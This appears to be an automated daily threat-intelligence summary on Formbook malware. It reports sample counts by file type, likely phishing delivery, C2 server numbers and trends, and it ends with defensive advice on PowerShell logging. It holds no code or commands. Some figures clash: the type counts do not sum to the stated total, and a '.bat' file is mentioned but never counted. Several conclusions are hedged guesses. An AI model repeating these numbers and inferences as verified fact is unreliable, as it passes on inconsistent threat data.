Daily Summary
Formbook activity surged today with 39 new samples detected, a 28% increase over the 7-day average of 30. This marks a notable uptick after several days of near-average volume, driven primarily by a sharp rise in PowerShell-based loaders.
New Samples Detected
PowerShell scripts (.ps1) dominate today’s haul at 25 samples, accounting for 64% of all new files. This represents a significant shift from the recent mix, where .js and .exe often shared equal footing. The .js count dropped to 6, while .exe fell to 3 - suggesting threat actors are doubling down on script-based, fileless delivery to bypass static detection. One .vbe file and one .cmd file indicate continued low-volume experimentation with alternate script hosts.
Distribution Methods
The heavy reliance on .ps1 files suggests delivery via phishing emails with attachments named with double extensions (e.g., invoice_2026-04-30.pdf.ps1) or links to hosted PowerShell scripts. The .js files likely arrive as HTA or JS attachments in malicious ZIP archives. The lone .bat and .cmd files may be used as secondary droppers in multistage campaigns. No geographic distribution data is available, but the script-heavy payloads align with current malspam trends.
Detection Rate
With 94 new IOCs submitted, detection rates among major AV vendors are likely moderate - many signature-based engines will flag known PowerShell obfuscation patterns, but heavily encoded or AMSI-bypassing variants may slip through. The shift to .ps1 suggests attackers are testing evasion methods that bypass traditional file-scanning at the gateway.
C2 Infrastructure
55 new C2 servers were identified today - a high number relative to sample volume, indicating a preemptive infrastructure refresh. No geographic patterns were provided, but the ratio of 1.4 C2s per sample suggests operators are rotating endpoints aggressively to avoid blacklisting.
7-Day Trend
Today’s 28% spike above the 7-day average breaks a steady plateau seen earlier in the week. Activity appears to be ramping up, likely aligning with a fresh phishing campaign using PowerShell lures.
Security Analysis
The disproportionate use of .ps1 over .exe and .js suggests Formbook operators are anticipating blocker detection on executable attachments and are leaning into PowerShell as a more trusted vector in corporate environments. This mirrors tactics used in a 2025 campaign targeting logistics firms. Defensively, SOC teams should enable PowerShell logging and enforce script block logging to capture deobfuscated loader commands, and block execution of .ps1 files from email attachments at the gateway unless explicitly approved.